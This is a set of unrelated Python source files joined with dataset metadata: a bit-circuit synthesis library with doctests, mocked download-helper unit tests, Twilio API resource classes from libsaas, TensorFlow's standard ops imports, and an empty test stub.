... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs < ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nif_(y) for (x, y) in zip(self, other)])
def xor(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.xor(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.xor_(y) for (x, y) in zip(self, other)])
def xor_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.xor_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.xor_(y) for (x, y) in zip(self, other)])
def __xor__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs ^ ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.xor_(y) for (x, y) in zip(self, other)])
def or_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.or_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.or_(y) for (x, y) in zip(self, other)])
def __or__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs | ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.or_(y) for (x, y) in zip(self, other)])
def nor(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nor(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nor_(y) for (x, y) in zip(self, other)])
def nor_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nor_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nor_(y) for (x, y) in zip(self, other)])
def __mod__(self, other) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs % ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nor_(y) for (x, y) in zip(self, other)])
def xnor(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.xnor(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.xnor_(y) for (x, y) in zip(self, other)])
def xnor_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.xnor_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.xnor_(y) for (x, y) in zip(self, other)])
def __eq__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs == ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.xnor_(y) for (x, y) in zip(self, other)])
def if_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.if_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.if_(y) for (x, y) in zip(self, other)])
def __ge__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs >= ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.if_(y) for (x, y) in zip(self, other)])
def imp(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.imp(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.imp_(y) for (x, y) in zip(self, other)])
def imp_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.imp_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.imp_(y) for (x, y) in zip(self, other)])
def __le__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs <= ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.imp_(y) for (x, y) in zip(self, other)])
def nand(self: bits, other) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nand(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nand_(y) for (x, y) in zip(self, other)])
def nand_(self: bits, other) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nand_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nand_(y) for (x, y) in zip(self, other)])
def __rshift__(self: bits, other) -> bits:
"""
Overloaded operator: rotation and shift operations.
>>> bit.circuit(circuit())
>>> bs = bits(map(bit, [1,1,1,1,0,0,0,0]))
>>> bs = bs >> 3
>>> [b.value for b in bs]
[0, 0, 0, 1, 1, 1, 1, 0]
>>> bit.circuit(circuit())
>>> bs = bits(map(bit, [0,0,0,0,1,1,1,1]))
>>> bs = bs >> {3}
>>> [b.value for b in bs]
[1, 1, 1, 0, 0, 0, 0, 1]
"""
if isinstance(other, set) and isinstance(list(other)[0], int): # Rotation.
quantity = list(other)[0]
return bits(self[len(self)-quantity:]) ** bits(self[0:len(self)-quantity])
else: # Shift
return bits([constant(0)]*other) ** bits(self[0:len(self)-other])
def __lshift__(self: bits, other) -> bits:
"""
>>> bit.circuit(circuit())
>>> bs = bits(map(bit, [1,1,1,1,0,0,0,0]))
>>> bs = bs << 3
>>> [b.value for b in bs]
[1, 0, 0, 0, 0, 0, 0, 0]
"""
return bits(self[other:]) ** bits([constant(0) for _ in range(other)])
def __truediv__(self: bits, other) -> Sequence[bits]:
"""
>>> bit.circuit(circuit())
>>> bs = bits(map(bit, [1,1,1,1,0,0,0,0]))
>>> bss = list(bs / 2)
>>> ([b.value for b in bss[0]], [b.value for b in bss[1]])
([1, 1, 1, 1], [0, 0, 0, 0])
>>> bit.circuit(circuit())
>>> bs = bits(map(bit, [1,1,1,1,0,0,0,0]))
>>> bss = list(bs / {2})
>>> [[b.value for b in bs] for bs in bss]
[[1, 1], [1, 1], [0, 0], [0, 0]]
>>> bit.circuit(circuit())
>>> bs = bits(map(bit, [1,1,1,1,0,0,0,0]))
>>> bss = list(bs / [1, 3, 4])
>>> [[b.value for b in bs] for bs in bss]
[[1], [1, 1, 1], [0, 0, 0, 0]]
"""
if isinstance(other, list) and len(other) > 0 and isinstance(other[0], int):
return map(bits, parts(self, length=other)) # Sequence of lengths.
elif isinstance(other, set) and len(other) == 1 and isinstance(list(other)[0], int):
return self / (len(self)//list(other)[0]) # Parts of length `other`.
else:
return map(bits, parts(self, other)) # Number of parts is `other`.
def __add__(self: bits, other) -> bits:
"""Concatenation of bit vectors."""
result = list(self)
result.extend(list(other))
return bits(result)
def __pow__(self: bits, other) -> bits:
"""Concatenation of bit vectors."""
return self + other
def constants(l):
return bits(map(constant, l))
def inputs(l):
return bits(map(input, l))
def outputs(l):
return bits(map(output, l))
def synthesize(f):
"""
Decorator for automatically synthesizing a circuit from a
function that takes only `bit` and/or `bits` objects as its
arguments and returns an output of type `bit` or `bits`.
>>> @synthesize
... def equal(x: bit, y: bit) -> bit:
... return (x & y) | ((1 - x) & (1 - y))
>>> xys = [bits([x, y]) for x in (0, 1) for y in (0, 1)]
>>> [equal.circuit.evaluate(xy) for xy in xys]
[[1], [0], [0], [1]]
>>> @synthesize
... def conjunction(xy: bits(2)) -> bits(2):
... return (xy[0], xy[0] & xy[1])
>>> xys = [bits([x, y]) for x in (0, 1) for y in (0, 1)]
>>> [conjunction.circuit.evaluate(xy) for xy in xys]
[[0, 0], [0, 0], [1, 0], [1, 1]]
>>> @synthesize
... def equal(x, y):
... return x & y
Traceback (most recent call last):
...
RuntimeError: automated circuit synthesis failed
"""
# Functions for determining types/signature from
# the type annotation of the decorated function.
type_in = lambda a: input(0) if a is bit else inputs([0] * a)
type_out = lambda a: output if a is bit else outputs
# For forward-compatibility with PEP 563.
eval_ = lambda a: eval(a) if isinstance(a, str) else a # pylint: disable=W0123
try:
# Construct the circuit and add it to the function as an attribute.
bit.circuit(circuit())
args_in = {
k: type_in(eval_(a))
for (k, a) in f.__annotations__.items() if k != 'return'
}
type_out(eval_(f.__annotations__['return']))(f(**args_in))
f.circuit = bit.circuit()
except:
raise RuntimeError('automated circuit synthesis failed') from None
# Return the original function.
return f
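# Illustrative sketch (not part of the original doctests): synthesizing a
# three-bit majority function. The decorator attaches the synthesized circuit
# as the `circuit` attribute, which can then be evaluated directly.
#
#     @synthesize
#     def majority(xyz: bits(3)) -> bit:
#         return (xyz[0] & xyz[1]) | (xyz[0] & xyz[2]) | (xyz[1] & xyz[2])
#
#     majority.circuit.evaluate([1, 1, 0]) # Expected to yield [1].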
if __name__ == "__main__":
doctest.testmod() # pragma: no cover
| 33.557218 | 92 | 0.440728 | 4,937 | 38,121 | 3.332388 | 0.054081 | 0.019815 | 0.020058 | 0.033613 | 0.744104 | 0.721736 | 0.710005 | 0.703319 | 0.686725 | 0.684658 | 0 | 0.028745 | 0.347499 | 38,121 | 1,135 | 93 | 33.586784 | 0.632669 | 0.554943 | 0 | 0.296748 | 0 | 0 | 0.008636 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.341463 | false | 0 | 0.020325 | 0.02439 | 0.747967 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 |
0
| 6 |
8a54efc9a7ad3665cabc7b4468043314dcb3122b
| 3,743 |
py
|
Python
|
test/test_downloadfile.py
|
foliant-docs/foliantcontrib.downloadfile
|
1af9481f9bc9142d8b1ac1eff93fa0c5577ccaec
|
[
"MIT"
] | null | null | null |
test/test_downloadfile.py
|
foliant-docs/foliantcontrib.downloadfile
|
1af9481f9bc9142d8b1ac1eff93fa0c5577ccaec
|
[
"MIT"
] | null | null | null |
test/test_downloadfile.py
|
foliant-docs/foliantcontrib.downloadfile
|
1af9481f9bc9142d8b1ac1eff93fa0c5577ccaec
|
[
"MIT"
] | null | null | null |
import shutil
from pathlib import Path
from unittest import TestCase
from unittest.mock import Mock
from unittest.mock import patch
from foliant.config.downloadfile import download_file
from foliant.config.downloadfile import get_file_ext_from_url
from foliant.config.downloadfile import get_file_name_from_url
class TestDownloadFile(TestCase):
def setUp(self):
self.project_dir = (Path(__file__).parent / 'project_dir').resolve()
self.project_dir.mkdir(exist_ok=True)
def tearDown(self):
shutil.rmtree(self.project_dir, ignore_errors=True)
@patch('foliant.config.downloadfile.urlopen', autospec=True)
def test_only_url(self, urlopen):
mock_response = Mock()
mock_response.read.return_value = b'File content'
urlopen.return_value = mock_response
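        # Because urlopen is patched, no real network request is made; the
        # downloaded body is the mocked b'File content' payload.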
url = 'http://example.com/myfile.txt'
download_file(root_dir=self.project_dir, url=url)
request = urlopen.call_args.args[0]
context = urlopen.call_args.kwargs['context']
self.assertEqual(request.headers, {})
self.assertIsNone(context)
with open(self.project_dir / 'myfile.txt') as f:
self.assertEqual(f.read(), 'File content')
@patch('foliant.config.downloadfile.urlopen', autospec=True)
def test_save_to(self, urlopen):
mock_response = Mock()
mock_response.read.return_value = b'File content'
urlopen.return_value = mock_response
url = 'http://example.com/myfile.txt'
save_to = 'subdir1/subdir2/downloaded.txt'
download_file(root_dir=self.project_dir, url=url, save_to=save_to)
request = urlopen.call_args.args[0]
context = urlopen.call_args.kwargs['context']
self.assertEqual(request.headers, {})
self.assertIsNone(context)
with open(self.project_dir / save_to) as f:
self.assertEqual(f.read(), 'File content')
@patch('foliant.config.downloadfile.urlopen', autospec=True)
def test_with_auth(self, urlopen):
mock_response = Mock()
mock_response.read.return_value = b'File content'
urlopen.return_value = mock_response
url = 'http://example.com/myfile.txt'
download_file(
root_dir=self.project_dir,
url=url,
login='john',
password='qwerty1234'
)
request = urlopen.call_args.args[0]
context = urlopen.call_args.kwargs['context']
self.assertIn('Authorization', request.headers)
self.assertIsNone(context)
with open(self.project_dir / 'myfile.txt') as f:
self.assertEqual(f.read(), 'File content')
class TestGetFileNameFromURL(TestCase):
def test_with_ext(self):
url = 'http://example.com/sub/myfile.txt'
name = get_file_name_from_url(url)
self.assertEqual(name, 'myfile.txt')
def test_no_ext(self):
url = 'http://example.com/sub/myfile'
name = get_file_name_from_url(url)
self.assertEqual(name, 'myfile')
def test_with_clutter(self):
url = 'http://example.com/sub/myfile.txt?param=val&foo=bar'
name = get_file_name_from_url(url)
self.assertEqual(name, 'myfile.txt')
class TestGetFileExtFromURL(TestCase):
def test_with_ext(self):
url = 'http://example.com/sub/myfile.txt'
ext = get_file_ext_from_url(url)
self.assertEqual(ext, '.txt')
def test_no_ext(self):
url = 'http://example.com/sub/myfile'
ext = get_file_ext_from_url(url)
self.assertEqual(ext, '')
def test_with_clutter(self):
url = 'http://example.com/sub/myfile.txt?param=val&foo=bar'
ext = get_file_ext_from_url(url)
self.assertEqual(ext, '.txt')
| 32.833333 | 76 | 0.663906 | 480 | 3,743 | 4.972917 | 0.177083 | 0.041475 | 0.052786 | 0.064097 | 0.804357 | 0.780897 | 0.780897 | 0.745706 | 0.745706 | 0.722246 | 0 | 0.003081 | 0.21961 | 3,743 | 113 | 77 | 33.123894 | 0.814105 | 0 | 0 | 0.623529 | 0 | 0 | 0.169116 | 0.036067 | 0 | 0 | 0 | 0 | 0.176471 | 1 | 0.129412 | false | 0.011765 | 0.094118 | 0 | 0.258824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
8a7777964dadf66bcb5c8207f5f26c1301e49cee
| 3,977 |
py
|
Python
|
libsaas/services/twilio/applications.py
|
MidtownFellowship/libsaas
|
541bb731b996b08ede1d91a235cb82895765c38a
|
[
"MIT"
] | 155 |
2015-01-27T15:17:59.000Z
|
2022-02-20T00:14:08.000Z
|
libsaas/services/twilio/applications.py
|
MidtownFellowship/libsaas
|
541bb731b996b08ede1d91a235cb82895765c38a
|
[
"MIT"
] | 14 |
2015-01-12T08:22:37.000Z
|
2021-06-16T19:49:31.000Z
|
libsaas/services/twilio/applications.py
|
MidtownFellowship/libsaas
|
541bb731b996b08ede1d91a235cb82895765c38a
|
[
"MIT"
] | 43 |
2015-01-28T22:41:45.000Z
|
2021-09-21T04:44:26.000Z
|
from libsaas import http, parsers
from libsaas.services import base
from libsaas.services.twilio import resource
class ApplicationsBase(resource.TwilioResource):
path = 'Applications'
class Application(ApplicationsBase):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class Applications(ApplicationsBase):
@base.apimethod
def get(self, FriendlyName=None, Page=None, PageSize=None, AfterSid=None):
"""
Fetch the Applications belonging to an account.
        :var FriendlyName: Only return the Application resources with friendly
names that exactly match this name.
:vartype FriendlyName: str
:var Page: The current page number. Zero-indexed, so the first page
is 0.
:vartype Page: int
:var PageSize: How many resources to return in each list page.
The default is 50, and the maximum is 1000.
:vartype PageSize: int
:var AfterSid: The last Sid returned in the previous page, used to
avoid listing duplicated resources if new ones are created while
paging.
:vartype AfterSid: str
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class ConnectAppsBase(resource.TwilioResource):
path = 'ConnectApps'
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class ConnectApp(ConnectAppsBase):
pass
class ConnectApps(ConnectAppsBase):
@base.apimethod
def get(self, Page=None, PageSize=None, AfterSid=None):
"""
Fetch the Connect Apps belonging to an account.
:var Page: The current page number. Zero-indexed, so the first page
is 0.
:vartype Page: int
:var PageSize: How many resources to return in each list page.
The default is 50, and the maximum is 1000.
:vartype PageSize: int
:var AfterSid: The last Sid returned in the previous page, used to
avoid listing duplicated resources if new ones are created while
paging.
:vartype AfterSid: str
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
class AuthorizedConnectAppsBase(resource.TwilioResource):
path = 'AuthorizedConnectApps'
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class AuthorizedConnectApp(AuthorizedConnectAppsBase):
pass
class AuthorizedConnectApps(AuthorizedConnectAppsBase):
@base.apimethod
def get(self, Page=None, PageSize=None, AfterSid=None):
"""
Fetch the Authorized Connect Apps belonging to an account.
:var Page: The current page number. Zero-indexed, so the first page
is 0.
:vartype Page: int
:var PageSize: How many resources to return in each list page.
The default is 50, and the maximum is 1000.
:vartype PageSize: int
:var AfterSid: The last Sid returned in the previous page, used to
avoid listing duplicated resources if new ones are created while
paging.
:vartype AfterSid: str
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
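# Usage sketch (illustrative only; how a resource is instantiated depends on
# the enclosing libsaas service object, so the accessor below is hypothetical):
#
#     apps = twilio_service.applications() # hypothetical accessor
#     apps.get(Page=0, PageSize=50) # first page of 50 applications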
| 28.007042 | 78 | 0.652753 | 458 | 3,977 | 5.648472 | 0.220524 | 0.027831 | 0.048705 | 0.0661 | 0.752223 | 0.734441 | 0.734441 | 0.730576 | 0.695787 | 0.67298 | 0 | 0.007187 | 0.265275 | 3,977 | 141 | 79 | 28.205674 | 0.878166 | 0.378175 | 0 | 0.68 | 0 | 0 | 0.024778 | 0.009818 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0.04 | 0.06 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 |
0
| 6 |
8a8c957af09c1662e1613d8819301ef9871bcd5c
| 5,914 |
py
|
Python
|
tensorflow/python/ops/standard_ops.py
|
ashutom/tensorflow-upstream
|
c16069c19de9e286dd664abb78d0ea421e9f32d4
|
[
"Apache-2.0"
] | 8 |
2021-08-03T03:57:10.000Z
|
2021-12-13T01:19:02.000Z
|
tensorflow/python/ops/standard_ops.py
|
CaptainGizzy21/tensorflow
|
3457a2b122e50b4d44ceaaed5a663d635e5c22df
|
[
"Apache-2.0"
] | 17 |
2021-08-12T19:38:42.000Z
|
2022-01-27T14:39:35.000Z
|
tensorflow/python/ops/standard_ops.py
|
CaptainGizzy21/tensorflow
|
3457a2b122e50b4d44ceaaed5a663d635e5c22df
|
[
"Apache-2.0"
] | 4 |
2022-01-13T11:23:44.000Z
|
2022-03-02T11:11:42.000Z
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=unused-import
"""Import names of Tensor Flow standard Ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import platform as _platform
import sys as _sys
from tensorflow.python import autograph
from tensorflow.python.training.experimental import loss_scaling_gradient_tape
# pylint: disable=g-bad-import-order
# Imports the following modules so that @RegisterGradient get executed.
from tensorflow.python.ops import array_grad
from tensorflow.python.ops import cudnn_rnn_grad
from tensorflow.python.ops import data_flow_grad
from tensorflow.python.ops import manip_grad
from tensorflow.python.ops import math_grad
from tensorflow.python.ops import random_grad
from tensorflow.python.ops import rnn_grad
from tensorflow.python.ops import sparse_grad
from tensorflow.python.ops import state_grad
from tensorflow.python.ops import tensor_array_grad
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.array_ops import * # pylint: disable=redefined-builtin
from tensorflow.python.ops.check_ops import *
from tensorflow.python.ops.clip_ops import *
from tensorflow.python.ops.special_math_ops import *
# TODO(vrv): Switch to import * once we're okay with exposing the module.
from tensorflow.python.ops.confusion_matrix import confusion_matrix
from tensorflow.python.ops.control_flow_ops import Assert
from tensorflow.python.ops.control_flow_ops import case
from tensorflow.python.ops.control_flow_ops import cond
from tensorflow.python.ops.control_flow_ops import group
from tensorflow.python.ops.control_flow_ops import no_op
from tensorflow.python.ops.control_flow_ops import tuple # pylint: disable=redefined-builtin
# pylint: enable=redefined-builtin
from tensorflow.python.eager import wrap_function
from tensorflow.python.ops.control_flow_ops import while_loop
from tensorflow.python.ops.batch_ops import *
from tensorflow.python.ops.critical_section_ops import *
from tensorflow.python.ops.data_flow_ops import *
from tensorflow.python.ops.functional_ops import *
from tensorflow.python.ops.gradients import *
from tensorflow.python.ops.histogram_ops import *
from tensorflow.python.ops.init_ops import *
from tensorflow.python.ops.io_ops import *
from tensorflow.python.ops.linalg_ops import *
from tensorflow.python.ops.logging_ops import Print
from tensorflow.python.ops.logging_ops import get_summary_op
from tensorflow.python.ops.logging_ops import timestamp
from tensorflow.python.ops.lookup_ops import initialize_all_tables
from tensorflow.python.ops.lookup_ops import tables_initializer
from tensorflow.python.ops.manip_ops import *
from tensorflow.python.ops.math_ops import * # pylint: disable=redefined-builtin
from tensorflow.python.ops.numerics import *
from tensorflow.python.ops.parsing_ops import *
from tensorflow.python.ops.partitioned_variables import *
from tensorflow.python.ops.proto_ops import *
from tensorflow.python.ops.ragged import ragged_dispatch as _ragged_dispatch
from tensorflow.python.ops.ragged import ragged_operators as _ragged_operators
from tensorflow.python.ops.random_ops import *
from tensorflow.python.ops.script_ops import py_func
from tensorflow.python.ops.session_ops import *
from tensorflow.python.ops.sort_ops import *
from tensorflow.python.ops.sparse_ops import *
from tensorflow.python.ops.state_ops import assign
from tensorflow.python.ops.state_ops import assign_add
from tensorflow.python.ops.state_ops import assign_sub
from tensorflow.python.ops.state_ops import count_up_to
from tensorflow.python.ops.state_ops import scatter_add
from tensorflow.python.ops.state_ops import scatter_div
from tensorflow.python.ops.state_ops import scatter_mul
from tensorflow.python.ops.state_ops import scatter_sub
from tensorflow.python.ops.state_ops import scatter_min
from tensorflow.python.ops.state_ops import scatter_max
from tensorflow.python.ops.state_ops import scatter_update
from tensorflow.python.ops.state_ops import scatter_nd_add
from tensorflow.python.ops.state_ops import scatter_nd_sub
# TODO(simister): Re-enable once binary size increase due to scatter_nd
# ops is under control.
# from tensorflow.python.ops.state_ops import scatter_nd_mul
# from tensorflow.python.ops.state_ops import scatter_nd_div
from tensorflow.python.ops.state_ops import scatter_nd_update
from tensorflow.python.ops.stateless_random_ops import *
from tensorflow.python.ops.string_ops import *
from tensorflow.python.ops.template import *
from tensorflow.python.ops.tensor_array_ops import *
from tensorflow.python.ops.variable_scope import * # pylint: disable=redefined-builtin
from tensorflow.python.ops.variables import *
from tensorflow.python.ops.parallel_for.control_flow_ops import vectorized_map
# pylint: disable=g-import-not-at-top
if _platform.system() == "Windows":
from tensorflow.python.compiler.tensorrt import trt_convert_windows as trt
else:
from tensorflow.python.compiler.tensorrt import trt_convert as trt
# pylint: enable=g-import-not-at-top
# pylint: enable=wildcard-import
# pylint: enable=g-bad-import-order
# These modules were imported to set up RaggedTensor operators and dispatchers:
del _ragged_dispatch, _ragged_operators
| 46.936508 | 93 | 0.825668 | 875 | 5,914 | 5.410286 | 0.244571 | 0.227714 | 0.325306 | 0.34981 | 0.5921 | 0.53929 | 0.367343 | 0.277989 | 0.118293 | 0.025771 | 0 | 0.001496 | 0.095536 | 5,914 | 125 | 94 | 47.312 | 0.88353 | 0.263274 | 0 | 0 | 0 | 0 | 0.001621 | 0 | 0 | 0 | 0 | 0.008 | 0.012048 | 1 | 0 | true | 0 | 0.963855 | 0 | 0.963855 | 0.012048 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
0a06508cf532e568943c2d6f9f6d327c4504fc73
| 56 |
py
|
Python
|
starry/_core/ops/lib/include/oblate/tests/test_derivs.py
|
rodluger/starry
|
da7fee48c5ef94278f0047be0579e2f13492cdd5
|
[
"MIT"
] | 116 |
2018-02-23T19:47:15.000Z
|
2022-02-21T04:43:46.000Z
|
starry/_core/ops/lib/include/oblate/tests/test_derivs.py
|
rodluger/starry
|
da7fee48c5ef94278f0047be0579e2f13492cdd5
|
[
"MIT"
] | 224 |
2018-02-26T00:41:51.000Z
|
2022-03-29T10:38:16.000Z
|
starry/_core/ops/lib/include/oblate/tests/test_derivs.py
|
rodluger/starry
|
da7fee48c5ef94278f0047be0579e2f13492cdd5
|
[
"MIT"
] | 25 |
2018-02-26T18:14:36.000Z
|
2021-11-30T01:00:56.000Z
|
import oblate
import numpy as np
import pytest
# TODO!
